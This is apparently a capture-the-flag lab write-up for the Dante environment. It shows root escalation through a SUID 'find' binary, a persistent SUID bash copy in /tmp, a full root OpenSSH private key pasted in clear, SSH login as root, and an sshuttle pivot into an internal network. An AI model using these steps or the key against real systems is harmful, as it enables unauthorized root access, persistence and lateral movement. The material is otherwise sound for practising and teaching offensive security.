Post Initial Foothold Enumeration
SUID set on FIND
Priv escalation find
./find . -exec /bin/bash -p \; -quitbalthazar@DANTE-WEB-NIX01:~/Desktop$ find . -exec /bin/sh -p \; -quit
# id
uid=1002(balthazar) gid=1002(balthazar) euid=0(root) groups=1002(balthazar)Finding the flag
cd /root
cat flag.txt
DANTE{Too_much_Pr1v!!!!}Making shell Better
#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod +s /tmp/rootbash
cd /tmp
./rootbash -p
Getting ssh key
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
Saving the file in is_rsa at local system and getting the root shell
vim id_rsa
chmod 600 id_rsa
ssh root@10.10.110.100 -i id_rsaGetting the IP of the internal subnet
Sshuttel to access the internal network
sshuttle -v -e "ssh -i id_rsa" -r root@10.10.110.100 -N